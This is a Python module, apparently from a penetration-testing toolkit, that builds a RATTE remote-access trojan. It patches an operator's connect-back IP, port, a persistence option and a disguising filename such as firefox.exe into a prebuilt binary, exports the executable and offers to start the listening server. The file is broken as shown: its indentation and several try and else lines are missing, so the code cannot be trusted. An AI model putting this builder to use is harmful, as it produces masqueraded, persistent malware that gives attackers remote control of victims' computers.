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154 lines
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154 lines
5.6 KiB
Executable file
#!/usr/bin/env python
# These are required fields
import os
import subprocess
from time import sleep
import src.core.setcore as core
from src.core.menu import text
# Py2/3 compatibility
# Python3 renamed raw_input to input
input = raw_input
except NameError:
# "This is RATTE (Remote Administration Tool Tommy Edition) prepare module.It will prepare a custom ratteM.exe."
MAIN = " RATTE (Remote Administration Tool Tommy Edition) Create Payload only. Read the readme/RATTE-Readme.txt first"
AUTHOR = " Thomas Werth"
# Start ratteserver
def ratte_listener_start(port):
subprocess.Popen("src/payloads/ratte/ratteserver %d" % port, shell=True).wait()
def prepare_ratte(ipaddr, ratteport, persistent, customexe):
core.print_info("preparing RATTE...")
# replace ipaddress with one that we need for reverse connection back
# Load content of RATTE
with open("src/payloads/ratte/ratte.binary", "rb") as fileopen:
data = fileopen.read()
# PATCH Server IP into RATTE
with open(os.path.join(core.userconfigpath, "ratteM.exe"), "wb") as filewrite:
host = (len(ipaddr) + 1) * "X"
r_port = (len(str(ratteport)) + 1) * "Y"
pers = (len(str(persistent)) + 1) * "Z"
# check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)
if customexe:
cexe = (len(str(customexe)) + 1) * "Q"
cexe = ""
filewrite.write(data.replace(cexe, customexe + "\x00", 1).replace(pers, persistent + "\x00", 1).replace(host, ipaddr + "\x00", 1).replace(r_port, str(ratteport) + "\x00", 1))
# filewrite.write(data.replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
# filewrite.write(data.replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
# def main(): header is required
def main():
valid_site = False
valid_ip = False
valid_response = False
input_counter = 0
# get User Input
# ipaddr=input(setprompt(["9", "2"], "IP address to connect back on"))
while valid_ip != True and input_counter < 3:
ipaddr = input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
input_counter += 1
# try:
# ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
# while ratteport==0 or ratteport > 65535:
# print_warning('Port must not be equal to javaport!')
# ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
# except ValueError:
# ratteport=8080
ratteport = int(input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == 0 or ratteport > 65535:
if ratteport == 0:
if ratteport > 65535:
ratteport = int(input(core.setprompt(["9", "2"], "Enter port RATTE Server should listen on [8080]")))
except ValueError:
# core.print_info("Port set to default of 8080")
ratteport = 8080
# persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# if persistent == 'no' or persistent == '' or persistent == 'n':
# persistent='NO'
# else:
# persistent='YES'
while not valid_response:
persistent = input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
persistent = str.lower(persistent)
if persistent == "no" or persistent == "n":
persistent = "NO"
valid_response = True
elif persistent == "yes" or persistent == "y":
persistent = "YES"
valid_response = True
valid_response = False
customexe = input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
# prepare RATTE
prepare_ratte(ipaddr, ratteport, persistent, customexe)
core.print_status("Payload has been exported to %s" % os.path.join(core.userconfigpath, "ratteM.exe"))
# start ratteserver
# prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
# if prompt == "yes" or prompt == "" or prompt == "y":
# print_info("Starting ratteserver...")
# ratte_listener_start(ratteport)
while not valid_response:
prompt = input(core.setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
prompt = str.lower(prompt)
if prompt == "no" or prompt == "n":
# prompt = "NO"
valid_response = True
elif prompt == "yes" or prompt == "y":
core.print_info("Starting ratteserver...")
core.print_info("Stopping ratteserver...")
valid_response = True
core.print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")